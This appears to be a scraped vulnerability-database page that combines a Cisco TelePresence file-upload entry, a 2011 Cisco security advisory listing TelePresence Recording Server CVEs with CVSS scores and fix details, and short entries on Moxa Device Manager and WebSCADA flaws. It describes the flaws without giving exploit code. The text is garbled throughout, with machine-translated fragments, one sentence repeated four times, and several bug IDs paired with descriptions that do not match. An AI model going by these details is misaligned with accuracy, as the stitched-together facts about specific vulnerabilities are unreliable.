The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary files on the webserver. This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server Advisory ID: cisco-sa-20110223-telepresence-ctrs Revision 1.0 For Public Release 2011 February 23 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= Multiple vulnerabilities exist within the Cisco TelePresence Recording Server. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. All releases of Cisco TelePresence software prior to 1.7.1 are affected by one or more of the vulnerabilities listed in this advisory. To determine the current version of software that is running on the Cisco TelePresence Recording Server, SSH into the device and issue the show version active and the show version inactive commands. The output should resemble the following example: admin: show version active Active Master Version: 1.7.0.0-151 Active Version Installed Software Options: No Installed Software Options Found. admin: show version inactive Inactive Master Version: 1.6.2.0-237 Inactive Version Installed Software Options: No Installed Software Options Found. In the preceding example, the system has versions 1.6.2 and 1.7.0 loaded on the device and version 1.7.0 is currently active. A device is affected only by vulnerabilities that are present in the active software version. Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The Cisco TelePresence solution allows for immersive, in-person communication and collaboration over the network with colleagues, prospects, and partners even when they are located in opposite hemispheres. These vulnerabilities are independent of each other. Unauthenticated Java Servlet Access +---------------------------------- A number of sensitive Java Servlets delivered via a Java Servlet framework within the Cisco TelePresence Recording Server could allow a remote, unauthenticated attacker to perform actions that should be restricted to administrative users. * Cisco TelePresence Recording Server - CSCtf42005 ( registered customers only) has been assigned the CVE identifier CVE-2011-0383. * Cisco TelePresence Recording Server - CSCtf97221 ( registered customers only) has been assigned the CVE identifier CVE-2011-0382. * Cisco TelePresence Recording Server - CSCth85786 ( registered customers only) has been assigned the CVE identifier CVE-2011-0385. This vulnerability could be leveraged to obtain full control of the affected device. * Cisco TelePresence Recording Server - CSCti50739 ( registered customers only) has been assigned the CVE identifier CVE-2011-0386. This vulnerability could allow an unauthenticated, adjacent attacker to trigger a buffer overflow condition. Because Cisco Discovery Protocol works at the data-link layer (Layer 2), an attacker must have a way to submit an Ethernet frame directly to an affected device. This may be possible in situations where the affected system is part of a bridged network or connected to a nonpartitioned device such as a network hub. * Cisco TelePresence Recording Server - CSCtd75769 ( registered customers only) has been assigned the CVE identifier CVE-2011-0379. Ad Hoc Recording Denial of Service +--------------------------------- A denial of service vulnerability exists within Cisco TelePresence Recording Server devices. A restart of the affected device may be required to regain functionality. * Cisco TelePresence Recording Server - CSCtf97205 ( registered customers only) has been assigned the CVE identifier CVE-2011-0391. Java RMI Denial of Service +------------------------- A denial of service vulnerability exists within Cisco TelePresence Recording Server devices due to a failure to properly restrict access to the RMI interface of the Java Servlet framework. An unauthenticated, remote attacker could trigger an out-of-memory condition on the Servlet host by issuing a series of crafted requests. * Cisco TelePresence Recording Server - CSCtg35830 ( registered customers only) has been assigned the CVE identifier CVE-2011-0388. This vulnerability could allow an unauthenticated, remote attacker to perform a limited number of actions on the system that should be restricted to authorized users. * Cisco TelePresence Recording Server - CSCtg35833 ( registered customers only) has been assigned the CVE identifier CVE-2011-0392. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Cisco Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss. * CSCtf42005 - Unauthenticated Java Servlet Access CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtf97221 - CGI Command Injection CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCth85786 - Unauthenticated Arbitrary File Upload CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCti50739 - XML-RPC Arbitrary File Overwrite CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtd75769 - Cisco Discovery Protocol Remote Code Execution CVSS Base Score - 7.9 Access Vector - Adjacent Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 6.5 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtf97205 - Ad Hoc Recording Denial of Service CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtg35830 - Java RMI Denial of Service CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtg35833 - Unauthenticated XML-RPC Interface CVSS Base Score - 7.5 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - Partial Availability Impact - Partial CVSS Temporal Score - 6.2 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the Unauthenticated Java Servlet Access (CSCtf42005) vulnerability could allow an unauthenticated, remote attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the affected device. In some instances this issue could be leveraged to gain complete control of the affected system. Successful exploitation of the Cisco Discovery Protocol Remote Code Execution (CSCtd75769) vulnerability could allow an unauthenticated, adjacent attacker to take complete control of the affected system. Successful exploitation of the Ad Hoc Recording Denial of Service (CSCtf97205) vulnerability could allow an unauthenticated, remote attacker to cause a persistent denial of service condition on an affected device. Successful exploitation of the Java RMI Denial of Service (CSCtg35830) vulnerability could allow an unauthenticated, remote attacker to cause all web-based services to become inaccessible. Successful exploitation of the Unauthenticated XML-RPC Interface (CSCtg35833) vulnerability could allow an unauthenticated, remote attacker to perform a number of actions that should be restricted to authenticated users. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Each row of the following Cisco TelePresence System Software table defines a specific defect, the first fixed release, and the recommended release to resolve all the security issues identified in this advisory as well as other non-security-related issues. Cisco recommends upgrading to a release equal to or later than the release in the Recommended Release column of the table. Workarounds =========== There are no device- or system-based workarounds for the identified vulnerabilities. Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. All vulnerabilities identified within this Security Advisory were discovered internally by Cisco. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-February-23 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/ +eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf =xAVI -----END PGP SIGNATURE----- . Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-February-23 | public | | | | release
VAR-201102-0182 CVE-2010-4741 Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201011-0390		 CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321. An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
VAR-201102-0174 CVE-2010-4733 WebSCADA Multiple Product Weak Password Vulnerabilities CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface
VAR-201102-0197 CVE-2010-4730 WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability